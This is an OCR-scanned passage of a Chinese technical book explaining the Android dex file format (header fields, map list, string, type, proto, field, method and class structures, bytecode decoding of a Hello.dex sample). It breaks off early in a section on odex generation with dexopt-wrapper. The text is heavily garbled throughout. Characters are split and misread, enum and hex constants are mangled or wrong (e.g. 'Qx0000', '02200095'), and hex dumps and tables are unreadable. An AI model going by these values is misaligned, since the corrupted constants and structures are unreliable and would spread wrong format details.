methodIdsSize; 
methodIdsOff; 
classDefsSize; 
classDefsOff; 
dataSize; 
dataOoff,; 


/* 
J* 
A 
的 
ja 
> 
Ar 
/* 
Ar 
j* 
pa 
J 
有 
ju 
J 
J* 
j* 
/* 
有 
Jj 
js 
/* 


dex 版 本 标识 */ 

adler32 检验 */ 

SHA-1 哈 希 值 */ 

整个 文件 大 小 */ 
DexHeader 结 构 大 小 */ 

字 节 序 标记 */ 

链接 段 大 小 */ 

链接 段 偏 移 */ 
DexMapList 的 文件 偏 移 */ 
DexStringId 的 个 数 */ 
DexStringIG 的 文件 偏 移 */ 
DexTypeId 的 个 数 */ 
DexTypeId 的 文件 仿 移 */ 
DexProtoId 的 个 数 */ 
DexProtoId 的 文件 偏 移 */ 
DexFielqdId 的 个 数 */ 
DexFielqId 的 文件 偏 移 */ 
DexMethodId 的 个 数 */ 
DexMethodId 的 文件 偏 移 */ 
DexClassDef 的 个 数 */ 
DexClassDef 的 文件 偏 移 */ 
数据 段 的 大 小 */ 
数据 段 的 文件 仿 移 */ 


magic 字 段 标 识 了 一 个 有 效 的 dex 文 件 ， 目 前 它 的 值 固定 为 <64 65 78 
0a 30 33 35 00”， 转 换 为 字符 串 为 “dex.035”。checksum 段 为 dex 文 件 的 校 
验 和 ， 通 过 它 来 判断 dex 文 件 是 否 被 损坏 或 算 改 。signature 字 段 用 来 识别 
最 佳 化 之 前 的 dex 文 件 ，checksum 字 段 与 signature 字 段 将 在 dexopt 验 证 与 
优化 一 节 中 详细 介绍 。fileSize 字 段 记 录 了 包括 DexHeader 在 内 的 整个 dex 
文件 的 大 小 。headerSize 字 段 记 录 了 DexHeader 结 构 本 吴 占 用 的 字数， 
目前 它 的 值 为 0x70。endianTag 字 段 指定 了 dex 运 行 环 境 的 cpu 字 节 序 ， 预 
设 值 ENDIAN_CONSTANT 等 于 0x12345678， 表 示 默 认 采 用 Little-Endian 


字 节 序 。linkSize 字 段 与 stringIdsOff 字 段 指定 链接 段 的 大 小 与 文件 偏 移 ， 
大 多 数 情况 下 它们 的 值 都 为 0。mapOff 字 有 段 指定 了 DexMapList 结 构 的 文 
件 偏 移 。 接 下 来 的 字段 分 别 表示 DexStringId、DexTypeld、DexProtold、 
DexFieldId、DexMethodId、DexClassDef 以 及 数据 段 的 大 小 与 文件 偏 
移 。 

DexHeader 结 构 下 面 的 数据 为 “索引 结构 区 ”与 “数据 区 ”， “索引 结构 
区 ”中 各 数据 结构 的 偏 移 地 址 都 是 从 DexHeader 结 构 的 stringIdsOff~ 
classDefsOff 字 上段 的 值 指定 的 ， 它 们 并 非 真正 的 类 数据 ， 而 是 指 同 dex 文 
件 的 data 数 据 区 〈DexData 字 段 ， 实 际 上 是 ubyte 字 节 数 组 ， 包 含 了 程序 
所 有 使 用 到 的 数据 〉 的 偏 移 或 数据 结构 索引 。 


4.3.3 ” dex 文件 结构 分 析 


为 了 使 dex 文 件 中 各 个 结构 的 讲解 过 程 更 加 容易 理解 ， 本 小 节 采 用 
3.2.2 节 中 的 Hello.dex 文 件 作 为 演示 对 象 。 
Dalvik 虚 拟 机 解析 dex 文 件 的 内 容 ， 最 终 将 其 映射 成 DexMapList 数 
据 结 构 。DexHeader 结 构 的 mapOff 字 上段 指 明了 DexMapList 结 构 在 dex 文 件 
中 的 偏 移 ， 它 的 声明 如 下 。 
struct DexMapList { 
u4 size; /* DexMapItem 的 个 数 */ 


DexMapItem list[1]; /* DexMapItem 结 构 */ 








站 
size 字 上段 表 示 接 下 来 有 多 少 个 DexMapItem 结 构 ，DexMapItem 的 结 
构 声 明 如 下 。 











struct DexMapItem { 


u2 type; /* KkDexType 开 头 的 类 型 */ 
u2 unused; /* 未 使 用 ， 用 于 字 节 对 齐 */ 
u4 size; /* 指定 类 型 的 个 数 */ 

u4 offset; /* 指定 类 型 数据 的 文件 偏 移 */ 


过 
type 字 段 为 一 个 枚 举 常 量 ， 如 下 所 示 ， 通 过 类 型 名 称 很 容易 判断 它 


的 具体 类 型 。 
enum { 
kDexTypeHeaderItem = Qx0000.; 
kDexTypeSstringIdItem = 0x0001, 
kDexTypeTypeldItem = 0x0002, 
kDexTypeProtoIdItem = KO0003., 
kDexTypeFieldIdItem = Ox0004, 
kDexTypeMethodIidItem = 0x0005， 
kDexTypeClassDefItem = 0X0006 ; 
kDexTypeMapList = Ox1000, 
kDexTypeTypeList = Qxl1001; 
kDexTypeAnnotationSetRefList 三 x 人 L002 
kDexTypeAnnotationSetItem = 0x1003; 
kDexTypeClassDataItem = 0X2000， 
kDexTypeCodeItem = 0x2004; 
kDexTypeStringDataItem = x2002. 
kDexTypeDebugInfoItem = 0X2003 ， 
KkDexTypeannotat1ionItem = Dx2004, 
kDexTypeEncodedArrayItem = 02200095: 
kDexTypeaAnnotationsDirectoryItem = ‘QOx2006. 


了 这 
DexMapItem 中 的 Size 字段 指定 了 特定 类 型 的 个 数 ， 它 们 以 特定 的 类 
型 在 dex 文 件 中 连续 存放 。offset 为 该 类 型 的 文件 起 始 偏 移 地 址 。 以 





Hello.dex 为 例 ，DexHeader 结 构 的 mapOff 字 段 值 为 0x290， 读 取 0x290 处 
的 一 个 双 字 值 为 0x0d， 表 明 接 下 来 会 有 13 个 DexMapItem 结 构 。 使 用 任 
意 的 十 六 进 制 编辑 器 打开 Hello.dex， 本 书 使 用 C32asm， 如 图 4-5 所 示 。 


886800290: 
B80082A0: 
88008280: 
B80082C0: 
8886082D00: 
B80082E0: 
880082F0: 
880608380: 
88999318: 
88008320: 











图 4-5 DexMapList 结 构 


根据 上 面 的 结构 描述 ， 整 理 出 的 13 个 DexMapItem 结 构 如 表 4-2 所 


表 4-2 DexMapItem 结 构 


2 办理 < 偏 。 移 


对 比 文件 头 DexHeader 部 分 ， 如 图 4-6 所 示 ，kDexTypeHeaderItem 描 





述 了 整个 DexHeader 结 构 ， 它 占用 了 文件 的 前 0x70 个 字 贡 的 空间 ， 而 接 
下 来 的 kDexTypeStringIdItem 一 kDexTypeClassDefItem 与 DexHeader 当 中 
对 应 的 类 型 及 类 型 个 数字 段 的 值 是 相同 的 。 


6068088698986:|0 


BS BA 36 5 B09 | | 
55 26 h4 F1 398 C5 47 F5 FA D2 f2 6F 
88 78 88 88 8989 78 56 34 12 88 88 88 


88 98 82 88 99 18 88 88 88 78 698 099 
88 88 BO 98 88 88 94 60 98 88 CC 99 808 
88 686 FC 98 86 86 85 60 86 98 864 061 080 
88 686 2C 61 8986 99 E4 81 868 898 4C 9691 80 





图 4-6 ”DexHeader 结 构 


比如 kDexTypeStringIdItem 对 应 了 DexHeader 的 stringIdsSize 与 
stringIdsOff 字 段 ， 表 明了 在 0x70 偏 移 处 ， 有 连续 0x10 个 DexStringId 对 


象 。DexStringId 结 构 的 声明 如 下 。 
struct, DexstringId 攻 


u4 stringDataOff:; /* 字符 串 数 据 偶 移 */ 
3 
DexStringId 结 构 只 有 一 个 stringDataOff 字 段 ， 直 接 指 向 字符 串 数 
据 ， 从 0x70 开 始 ， 整 理 16 个 字符 串 ， 结 果 如 表 4-3 所 示 。 


表 4-3 ”DexStringId 结 构 列 表 





字 符 申 


偏 移 
0x0 Oxlca <init> 
| hi | | 
os | | 


0x 4 Oxle6 LHello: 

0x5 Oxlef Liava/io/PrintStream; 

上 表 中 的 字符 串 并 非 普 通 的 ascii 字 符 串 ， 它 们 是 由 MUTF-8 编 码 来 
表示 的 。MUTF-8 含 义 为 Modified UTF-8， 即 经 过 修改 的 UTF-8 编 码 ， 它 
与 传统 的 UTF-8 很 相似 ， 但 有 以 下 几 点 区 别 : 

e MUTF-8 使 用 1 一 3 字 节 编码 长 度 。 

e 大 于 16 位 的 Unicode 编 码 U+10000~U+10ffff 使 用 3 字 节 来 编码 。 

e U+0000 采 用 2 字 节 来 编码 。 

e 采用 类 似 于 C 语 言 中 的 空 字符 nul 作 为 字符 串 的 结尾 

MUTF-8 可 表示 的 有 效 字 符 范 围 有 大 小 写字 母 与 数 
字 、 人 检 人 U+00al~U+1fff、 U+2010~U+2027、 
U+2030~U+d7ff、U+e000~U+ffef、U+10000~U+10ffff。 它 的 实现 代码 
如 下 。 























DEX_INLINE const char* dexGetStringDatal(const DexFile* pDexFile, 
const DexStringId* pStringId) { 
const ul* ptr = pDexFile->baseAddr + pStringId->stringDataoff; // 指 问 
MUTF-8 学 符 串 的 指针 
// Skip the uleb128 length. 
while (*{(ptr++) > 0x7f) /* empty */ ;，; 
return (const char*) ptr; 


} 

MUTF-8 字 符 串 的 头 部 存放 的 是 由 uleb128 编 码 的 字符 的 个 数 。 注 
意 : 这 里 是 个 数 ， 如 字符 序列 “02 e4 bd a0 e5 a5 bd 00” 头 部 的 02 即 表示 
字符 串 有 两 个 字符 ，“e4 bd a0” 是 UTF-8 编 码 字 符 “ 你 "，“e5 a5 bd”* 是 
UTF-8 编 码 字 符 “ 好 ”， 而 最 后 的 空 字 符 0 表 示 字 符 串 结尾 ， 不 过 字符 个 数 
好 像 没 有 算 上 它 。 为 什么 不 包含 空 字 符 呢 ? 因 为 它 不 重要 ? 

下 面 是 kDexTypeStringIdItem 了 ， 它 对 应 DexHeader 中 的 typeldsSize 


与 typeldsOff 字 段 ， 指 同 的 结构 体 为 DexTypeld， 声 明 如 下 。 
struct DexTypelId ({ 


u4 descriptorIdx:; /* 指 问 DexStringId 列 表 的 索引 */ 











}; 

descriptorIdx 为 指 问 DexStringld 列 表 的 索引 ， 它 对 应 的 字符 串 代 表 
了 具体 类 的 类 型 。 从 0xb0 开 始 有 7 个 DexTypeld 结 构 ， 也 就 是 有 7 个 字符 
串 的 索引 ， 整 理 后 如 表 4-4 所 示 。 


表 4-4 DexTypeId 结 构 列 表 
字符 串 索引 E 


一 4 


接着 是 kKDexTypeProtoIldItem， 它 对 应 DexHeader 中 的 protoldsSize 与 
protoIldsOff 字 段 ， 指 问 的 结构 体 为 DexProtoId， 声 明 如 下 。 








类 型 索引 








struct DexProtoId { 


u4 shortyIdx; /* 指 问 DexStringId 列 表 的 索引 */ 
u4 returnTypelIdx; /* 指 问 DexTypeId 列 表 的 索引 */ 
u4 parametersOff; /* 指 癌 DexTypeList 的 俩 移 */ 


}; 
DexProtoId 是 一 个 方法 声明 结构 体 ，shortyIdx 为 方法 声明 字符 串 ， 
returnTypeldx 为 方法 返回 类 型 字符 串 ，parametersOff 指 同一 个 


DexTypeList 结 构 体 ， 存 放 了 方法 的 参数 列表 ，DexTypeList 声 明 如 下 。 
struct DexTypeList { 


u4 size; /* 接 下 来 DexTypeItem 的 个 数 */ 
DexTypeItem list[1]; /* DexTypeItem 结构 */ 
DexTypeltem 声 明 如 下 。 
struct DexTypeltem { 
u2 typeIdx; /* 指向 pexTypeIda 列 表 的 索引 */ 


辐 - 





DexTypeItem 中 的 typeIdx 最 终 也 是 指 同一 个 字符 串 。 从 0xcc 开 始 有 4 
个 DexProtoId 绪 构 ， 整 理 后 如 表 4-5 所 示 。 


表 4-5 ”DexProtoId 结 构 列 表 














通过 上 表 可 以 发 现 ， 方 法 声明 由 返回 类 型 与 参数 列表 组 成 ， 并 且 返 
回 类 型 位 于 参数 列表 的 前 面 。 

接 下 来 是 kDexTypeFieldIdItem， 它 对 应 DexHeader 中 的 fieldIdsSize 
与 fieldIdsOff 字 段 ， 指 问 的 结构 体 为 DexFieldId， 声 明 如 下 。 


struct DexFieldId ({ 


u2 classIdx; /* 类 的 类 型 ， 指 向 pexTypeId 列 表 的 索引 */ 
u2 typeIdx; /* 字段 类 型 ， 指 癌 DexTypeId 列 表 的 索引 */ 
u4 nameIdx:; /* 字段 名 ， 指 问 DexStringId 列 表 的 索引 */ 


站 
DexFieldId 结 构 中 的 数据 全 部 是 索引 值 ， 指 明了 字段 所 在 的 类 、 字 
段 的 类 型 以 及 字段 名 。 从 0xfc 开 始 共有 1 个 DexFieldId 结 构 ， 整 理 后 的 结 
果 如 表 4-6 所 示 。 

表 4-6 ”DexFieldId 结 构 列 表 


Em 





Ljava/lang/System:; Ljava/io/PrintStream; 


接 下 来 是 kDexTypeMethodIdItem， 它 对 应 DexHeader 中 的 
methodIdsSize 与 methodIdsOff 字 7 段 ， 指 癌 的 结构 体 为 DexFieldId， 声 明 如 


struct DexMethodId { 
u2 classIdx; /* 类 的 类 型 ， 指 向 DexTypeId 列 表 的 索引 */ 
u2 protoIdx; /* 声明 类 型 ， 指 向 DexProtoId 列 表 的 索引 */ 
u4 nameIdx; /* 方法 名 ， 指 向 DexStringId 列 表 的 索引 */ 


和 
同样 ，DexMethodId 结 构 的 数据 也 都 是 索引 值 ， 指 明了 方法 所 在 的 
类 、 方 法 的 声明 以 及 方法 名 。 从 0x104 开 始 共 有 5 个 DexMethodId 结 构 ， 
整理 后 的 结果 如 表 4-7 所 示 。 
表 4-7 DexMethodId 结 构 列 表 
方法 声明 












LHello; 
LHello: 
LHello; 
Ljava/io/PrintStream:; 
Ljava/lang/Object; 


















接 下 来 是 kDexTypeClassDefItem， 它 对 应 DexHeader 中 的 





classDefsSize 与 classDefsOff 字 段 ， 指 同 的 结构 体 为 DexClassDef， 声 明 如 


再 二 
struct DexClassDef { 
u4 classIdx; /* 类 的 类 型 ， 指 向 pexTypeId 列 表 的 索引 */ 
u4 accessFlags; /* 访问 标志 */ 
u4 superclassIdx; /* 父 类 类 型 ， 指 向 DexTypeId 列 表 的 索引 */ 
u4 :interfacesOff:; /* 接口 ， 指 向 DexTypeList 的 偏 移 */ 
u4 sourceFileIdx:; /* 源 文件 名 ， 指 向 DexsStringId 列 表 的 索引 */ 
u4 annotationsoff; /* 注解 ， 指 向 DexannotationsDirectoryItem 结 构 */ 
u4 classDataOff; /* 指 问 DexClassData 结 构 的 偏 移 */ 
u4 staticvaluesOff; /* 指向 DexEncodedArray 结 构 的 偏 移 */ 





else 比 起 上 面 介 绍 的 结构 要 复杂 一 些 ，classIdx 字 段 是 一 个 
索引 值 ， 表 明 类 的 类 型 ，accessFlags 字 段 是 类 的 访问 标志 ， 它 是 以 
ACC 开头 的 一 个 枚 举 值 ，superclassIdx 字 段 是 父 类 类 型 索引 值 ， 如 果 类 
中 含有 接口 声明 或 实现 ，interfacesOff 字 段 会 指 癌 1 个 DexTypeList 结 构 ， 
侍 则 这 里 的 值 为 0，sourceFileIdx 字 上段 是 字符 串 索 引 值 ， 表 示 类 所 在 的 源 
文件 名 称 ，annotationsOff 字 上 段 指 癌 注 解 目 录 结 构 ， 根 据 类 型 不 同 会 有 注 
解 类 、 注 解 方法 、 注 解 字 段 与 注解 参数 ， 如 果 类 中 没有 注解 ， 这 里 的 值 
则 为 0，classDataOff 字 上 段 指 向 DexClassData 结 构 ， 它 是 类 的 数据 部 分 ， 
下 面 会 做 详细 介绍 。staticValuesOff 字 段 指向 DexEncodedArray 结 构 ， 记 
录 了 类 中 的 静态 数据 。 

DexClassData 结 构 的 声明 在 DexClass.h 文 件 中 ， 它 的 声明 如 下 。 


struct DexClassData { 











DexClassDataHeader header; /* 指定 字段 与 方法 的 个 数 */ 
DexField* staticFields; /* 静态 字段 ，DexField 结 构 */ 
DexField* instanceFields; /* 实例 字段 ，DexField 结 构 */ 
DexMethod* directMethods; /* 直接 方法 ，DexMethod 结 构 */ 
DexMethod* virtualMethods; /* 虚 方 法 ，DexMethod 结 构 */ 


2 
DexClassDataHeader 结 构 记 录 了 当前 类 中 字段 与 方法 的 数目 ， 它 的 


声明 如 下 。 


struct DexClassDataHeader { 


u4 staticFieldsSize; /* 静态 字段 个 数 */ 
u4 instanceFieldsSize; /* 实例 字段 个 数 */ 
u4 directMethodsSize; /* 直接 方法 个 数 */ 
u4 virtualMethodsSize; /* 虚 方 法 个 数 */ 


je 
DexClassDataHeader 的 结构 与 DexClassData 一 样 ， 都 是 在 DexClass.h 


文件 中 声明 的 ， 为 什么 不 是 在 DexFile.h 中 声明 呢 ? 它 们 都 是 DexFile 文 件 
结构 的 一 部 分 啊 ! 我 想 可 能 的 原因 是 DexClass.h 文 件 中 所 有 结构 的 u4 类 

型 的 字段 其 实 都 是 uleb128 类 型 的 。 前 面 已 经 介绍 过 了 ，uleb128 使 用 1 一 
5 个 字 节 来 表示 一 个 32 位 的 值 ， 大 多 数 情 况 下 ， 字 段 中 这 些 数据 可 以 用 

小 于 2 个 字 节 的 空间 来 表示 ， 因 此 ， 采 用 uleb128 会 节省 更 多 的 存储 空 

间 。 














DexField 结 构 描 述 了 字段 的 类 型 与 访问 标志 ， 它 的 结构 声明 如 下 。 
struct DexField { 


u4 fieldIdx; /* 指 问 DexFielqdId 的 索引 */ 
u4 accessFlags; /* 访问 标志 */ 
ey 
fieldIdx 字 上段 为 指向 DexFieldId 的 索引 ，accessFlags 字 上 段 与 
DexClassDef 中 的 相应 字段 的 类 型 相同 。 
DexMethod 结 构 描述 方法 的 原型 、 名 称 、 访 问 标志 以 及 代码 数据 
块 ， 它 的 结构 声明 如 下 。 


struct DexMethod { 


u4 methodIdx; /* 指向 DexMethodId 的 索引 */ 
u4 accessFlags; /* 访问 标志 */ 
u4 codeOff; /* 指 问 DexCode 结 构 的 仿 移 */ 


}; 
methodIdx 字 段 为 指向 DexMethodId 的 索引 ，accessFlags 字 段 为 访问 
标志 ，codeOff 字 有 段 指 向 了 一 个 DexCode 结 构 体 ， 后 者 描述 了 方法 更 详细 


的 信息 以 及 方法 中 指令 的 内 容 。DexCode 结 构 声 明 如 下 。 
struct DexCode { 
u2 registersSize;  /* 使 用 的 寄存 器 个 数 */ 


u2 insSize; /* 参数 个 数 */ 

u2 outsSize; /* 调用 其 他 方法 时 使 用 的 寄存 器 个 数 */ 
u2 triesSize; /* Try/Catch 个 数 */ 

u4 debugInfooOff; /* 指 回 调试 信息 的 偶 移 */ 

u4 insnsSize; /* 指令 集 个 数 ， 以 2 字 节 为 单位 */ 

u2 insns[1]; /* 指令 集 */ 


/* 2 字 节 空间 用 于 结构 对 齐 */ 

/* try_item[triesSize] DexTry 结构 */ 

/* Try/Catch 中 handler 的 个 数 */ 

/* catch handler item[handlersSize] ，DexCatchHandler 结 构 */ 
}; 
通过 上 面 层 层 的 分 析 ， 到 这 里 终于 看 到 存放 指令 集 的 结构 了 ! 我 可 


以 保证 ，DexCode 是 本 小 节 讲 解 的 最 后 一 个 结构 了 。registersSize 字 段 指 
定 了 方法 中 使 用 的 寄存 器 个 数 ， 还 记得 上 一 章 讲 解 Smali 语 法 时 
的 “.register” 指 令 么 ?对 了 ! 束 是 它 的 值 。insSize 字 段 指 定 了 方法 的 参数 
个 数 ， 它 对 应 Smali 语 法 中 的 “.paramter” 指 令 。outsSize 指 定 方 法 调用 外 
部 方法 时 使 用 的 寄存 器 个 数 ， 我 们 这 么 来 理解 ， 现 在 有 一 个 方法 ， 使 用 
了 5 个 寄存 器 ， 其 中 有 2 个 为 参数 ， 而 该 方法 调用 了 男 一 个 方法 ， 后 者 使 
用 了 20 个 寄存 器 ， 那 么 ，Dalvik 虚 拟 机 在 分 配 时 ， 会 在 分 配 自 映 方法 寄 
存 器 空间 时 加 上 那 20 个 寄存 器 空间 。triesSize 字 上 段 指 定 方法 中 Try/Catch 
的 个 数 ， 关 于 TryCatch 的 详细 信息 会 在 本 书 的 第 5 章 进 行 介 绍 。 如 果 dex 
文件 保留 了 调试 信息 ，debugInfoOff 字 段 会 指向 它 ， 调 试 信息 的 解码 函 
数 为 dexDecodeDebugInfo0， 有 兴趣 的 读者 可 以 在 DexzDebugInfo.cpp 文 件 
中 查看 其 实现 ， 这 里 不 再 展开 。insnsSize 字 段 指定 了 接 下 来 的 指令 个 
数 ，insns 字 段 即 为 真正 的 代码 部 分 了 ! 

从 0x12c 开 始 共有 1 个 DexClassDef 结 构 ， 下 面 开始 分 析 它 。 第 1 个 字 
段 为 索引 值 1， 指 定 的 字符 串 为 “LHello;*”， 表 明 类 名 为 Hello， 第 2 个 字 


段 为 1， 访 问 标 志 为 ACC_PUBLIC， 第 3 个 字段 为 ?9， 指 向 的 字符 串 

为 “Ljava/lang/Object;”， 这 是 Hello 的 父 类 名 ， 第 4 个 字段 为 0， 表 示 没 有 
接口 ， 第 5 个 字段 为 1， 指 同 的 字符 串 为 “Hello.java”， 这 是 类 的 源 文 件 
名 ， 第 6 个 字段 为 0， 表 示 没 有 注解 ， 第 7 个 字段 为 0x27b， 指 问 
DexClassData 结 构 ， 第 8 个 字段 为 0， 表 示 没 有 静态 值 。 

从 0x27b 开 始 先 读 取 DexClassDataHeader 结 构 ， 为 4 个 uleb128 值 ， 结 
果 分 别 为 0、0、2、1， 表 示 该 类 不 含 字段 ， 有 2 个 直接 方法 与 1 个 虚 方 
法 。 由 于 类 中 不 含 字段 ， 因 此 DexClassData 结 构 中 的 两 个 DexField 结 构 
也 就 没戏 了 ， 0 第 1 个 字段 为 0， 指 同 的 
DexMethodId 为 第 1 条 ， 也 就 是 “<init>” 方 法 ， 第 2 个 字段 “81 ”80 ”04” 为 
10001， 访 问 标志 为 ACC_PUBLIC | ACC_CONSTRUCTOR， 第 3 个 字 
段 *cc 02” 为 14c， 指 向 DexCode 结 构 ， 从 0x14c 开 始 解 析 DexCode， 得 出 
结果 为 : 寄存 器 个 数 、 参 数 、 内 部 函数 使 用 寄存 器 都 为 1 个 ， 方 法 中 有 4 
条 指令 ， 指 令 为 “7010 0400 0000 0e00”， 打 开 Android 4.0 系 统 源码 目录 
下 的 dalvik/docs/dalvik-bytecode.html 文 件 ， 查 找到 70 的 Opcode 为 invoke- 
direct， 格 式 为 35c， 打 开 Android 4.0 系 统 源码 目录 下 的 
dalvik/docs/instruction-formats.html 文 件 ， 查 找到 35c 的 指令 格式 


人 Ga BBBB FIEIDIC”， 并 且 有 以 下 7 种 表示 方式 。 
[A=5] op {VvC, VD, vE, VvF, VG}, meth@BBBB 
[A=5] op {VvC, VD, VE, VF, VG}, type@BBBB 
[A=4] op {VvC, VvD, VvE, VF}, kind@BBBB 

[A=3] op {VvC, VvD, VvE}, kind@BBBB 

[ 

[ 

[ 
































A=2] Op {veE, vi}, FIndeEBBB 

A=1] op {vC}, kind@BBBB 

A=0] op {}, kind@BBBB 

站 令 7010 中 A 为 1，G 为 0， 表 示 采 用 代码 为 “[A=1] op {vC}, 
kind@BBBB” 方 式 ， 且 其 中 的 vC 为 v0 寄存 器 ， 指 令 后 面 的 BBBB 
与 “FI|E|D|C” 都 是 16 位 ，7010 后 面 的 两 个 16 位 都 为 0%， 因 此 BBBB=0 量 





FE=E=D=C=0，BBBB 为 kind@ 类 型 ， 它 是 指向 DexMethodId 列 表 的 索引 
值 ， 通 过 查找 得 到 方法 名 为 “<init>”"。 指 令 0e00 直 接 查 表 得 到 return- 
void。 最 终 ， 解 码 指令 可 得 到 如 下 代码 段 。 


7010 0400 0000 invoke-direct {v0}, Ljava/lang/Object; .<init>:()V 
0e00 return-void 


按照 上 面 的 分 析 步 又 ， 读 者 可 自行 分 析 完 剩 下 的 1 个 直接 方法 与 1 个 
虚 方法 ， 限 于 篇 幅 ， 此 处 不 再 展开 。 回 头 看 表 4-2 所 示 的 结构 ， 
kDexTypeCodeltem 与 上 而 分 析 的 DexCode 结 构 相 对 应 。 
kDexTypeTypeList 与 上 面 分 析 的 DexTypeList 结 构 相 对 应 。 
kDexTypeStringDataltem 则 指向 了 DexStringId 字 符 串 列表 的 首 地 址 。 
kDexTypeDebugInfoltem 指 同 了 调试 信息 偏 移 ， 与 DexCode 的 
debugInfoOff 字 上 段 指 向 的 内 容 相 同 。kDexTypeClassDataltem 指 同 了 
DexClassData 结 构 。 最 后 的 kDexTypeMapList 指 向 了 DexMaplItem 结 构 自 
冉 。 

至 此 ，dex 文 件 结构 就 分 析 完 了 。 为 了 便于 理解 dex 文 件 格式 ， 笔 者 
画 了 一 张 dex 文 件 结构 图 ， 读 者 可 以 参照 随 书 的 附 图 1 来 辅助 学 习 。 


4.4 odex 文 件 格 式 


odex 是 OptimizedDEX 的 缩写 ， De 的 dex 文 件 。 那 么 odex 
有 什么 作用 ? 它 的 结构 又 是 怎样 的 呢 ? 这 些 问 题 的 答 守 将 会 本 小 节 进 行 
揭晓 。 


4.4.1 ”如 何 生 成 odex 文 件 


odex 有 两 种 存在 的 方式 : 一 种 是 从 apk 程 序 中 提取 出 来 ， 与 apk 文 件 
存放 在 同一 目录 且 文 件 后 级 为 odex 的 文件 ， 这 类 odex 文 件 多 是 Android 
ROM 的 系统 程序 ， 另 一 种 是 dalvik-cache 组 存 文件 ， 这 类 odex 文 件 仍然 
以 dex 作 为 后 缀 ， 存 放 在 cache/dalvik-cache 目 录 下 ， 保 存 的 形式 为 “apk 路 
径 @apk 名 @classes.dex”， 例 
如 “system(@app@Calculator.apk@classes.dex” 表 示 安 装 在 /system/app 目 录 
下 Calculator.apk 程 序 的 odex 文 件 ， 而 “data@app@com.wochacha- 
1.apk@classes.dex” 表 示 安 装 在 /data/app 目 录 下 com.wochacha-1.apk 程 序 的 
odex 文 件 。 

由 于 Android 程 序 的 apk 文 件 为 zip 压 纵 包 格式 ，Dalvik 虚 拟 机 每 次 加 

载 它们 时 需要 从 apk 中 读 取 classes.dex 文 件 ， 这 样 会 耗费 很 多 cpu 时 间 ， 
而 采用 odex 方 式 优化 的 dex 文 件 ， 已 经 包含 了 加 载 dex 必 须 的 依赖 库 文 件 
列表 ，Dalvik 虚 拟 机 只 需 检 测 并 加 载 所 需 的 依赖 库 即 可 执行 相应 的 dex 文 
件 ， 这 大 大 缩短 了 读 取 dex 文 件 所 需 的 时 间 ， 而 对 于 部 分 Android 系 统 的 
ROM， 由 于 将 系统 app 全 部 转换 成 外 置 的 odex 文 件 与 apk 放 在 同一 目录 ， 
这 样 系统 在 启动 加 载 这 些 程序 时 会 节省 更 多 的 时 间 ， 局 动 速度 自然 也 会 
更 快 。 

在 Android 系 统 2.3 版 本 以 前 ， 系 统 源码 中 提供 了 一 个 生成 odex 文 件 




















的 工具 dexopt-wrapper， 它 的 代码 位 于 Android 2.2 系 统 源码 的 
build/tools/dexpreopt/dexopt-wrapper/ 目 录 下 ， 阅 读 dexopt-wrapper 主 程序 
源码 DexOptWrapper.cpp 文 件 ， 发 现 它 实现 调用 的 是 /system/bin/dexopt 程 
序 。 使 用 dexopt-wrapper 生 成 odex 文 件 的 方法 很 简单 ， 首 先 需要 将 
dexopt-wrapper 程 序 push 到 Android 设 备 上 并 赋予 执行 权限 ， 执 行 以 下 命 
分 . 
~ : 

adb push dexopt-wrapper /data/local/ 

adb shell chmod 777 /data/local/dexopt-wrapper 

本 节 演 示 的 实例 仍然 是 上 一 节 使 用 过 的 Hello.dex 文 件 ， 将 Hello.dex 
文件 改名 为 classes.dex 并 打包 成 zip 文 件 ， 接 着 将 zip 文 件 push 到 dexopt- 
wrapper 同 目录 ， 执 行 以 下 命令 : 

adb push Hello.zip /data/local/ 

调用 dexopt-wrapper 来 生成 odex 文 件 ， 执 行 以 下 命令 : 


. /dexopt-wrapper Hello.zip Hello.odex 


执行 无 误会 有 如 下 输出 : 


./dexopt-wrapper Hello.zip Hello.odex 
--- BEGIN 'Hello.zZip' (bootstrap=0) --- 
--- waliting for verifytopt, pid=29114 
--—- Would reduce privs here 


--- END 'Hello.zlp' (SuccesSS) --- 
最 后 将 odex 文 件 pull 出 来 以 备 后 续 分 析 ， 执 行 以 下 命令 : 
adb pull /data/local/Hello.odex 


4.4.2 ”odex 文 件 整 体 结构 


odex 文 件 的 结构 可 以 理解 为 dex 文 件 的 一 个 超 集 。 它 的 结构 如 图 4-7 
所 示 ，odex 文 件 在 dex 文 件 头 部 添加 了 一 些 数 据 ， 然 后 在 dex 文 件 尾部 添 
加 了 dex 文 件 的 依赖 库 以 及 一 些 辅助 数据 。 











odex 文 件 头 


dex 文 件 


依赖 库 
辅助 数据 


图 4-7 ”odex 文 件 结构 


odex 文 件 的 写 入 与 读 取 并 没有 像 dex 文 件 那样 定义 了 全 系列 的 数据 
结构 ， 不 过 通过 对 Dalvik 目 录 下 的 源码 阅读 分 析 ， 还 是 可 以 整理 出 相关 
的 结构 。 在 上 一 节 中 讲 到 ，Dalvik 虚 拟 机 将 dex 文 件 映 射 到 内 存 中 后 是 
DexFile 格 式 ， 在 Android 系 统 源码 的 dalvik\ibdex\DexFile.h 文 件 中 它 的 定 
AEs 





struct DexFile { 


}; 


/* directly-mapped "opt" header */ 
const DexOptHeader* pOptHeader; 


/* pointers to directly-mapped structs and arrays in base DEX */ 
const DexHeader* pHeader; 

const DexStringId* pStringIds; 

const DexTypelId* pTypelds; 

const DexFieldId* pFieldIds; 

const DexMethodId* pMethodIds; 

const DexProtoId* PProtoIds ; 

const DexClassDef* pClassDefs; 


const DexLink* pLinkData; 


/* 

* These are mapped out of the "auxillary" section, and may not be 
* included in the file. 

Re 

const DexClassLookup* pClassLookup; 


const. void* pRegisterMapPool]l; // RegisterMapClassPool 


/* points to start of DEX file data */ 


const ul* baseaAddr; 


/* track memory overhead for auxillary structures */ 


nt overhead; 


/* additional app-specific data structures associated with the DEX */ 
//vVvoid* auxData; 


可 以 看 到 ， 这 个 DexFile 结 构 中 存 入 的 多 为 其 它 结构 的 指针 。 
DexFile 最 前 面 的 DexOptHeader 就 是 odex 的 头 ，DexLink 以 下 的 部 分 被 称 
为 “auxillary section”， 即 辅助 数据 段 ， 它 记录 了 dex 文 件 被 优化 后 添加 的 
一 些 信 息 。 然 而 ，DexFile 结 构 描述 的 是 加 载 进 内 存 的 数据 结构 ， 还 有 
一 些 数据 是 不 会 加 载 进 内 存 的 ， 经 过 分 析 ，odex 文 件 结构 定义 整理 如 


Ts 





struct ODEXFile { 


DexOptHeader 
DEXFile 


Dependences 


ChunkDexClassLookup 
ChunkReglisterMapPool 


ChunkEnd 


有 


header; /* odex 文 件 头 */ 
dexfile; /* dex 文 件 */ 
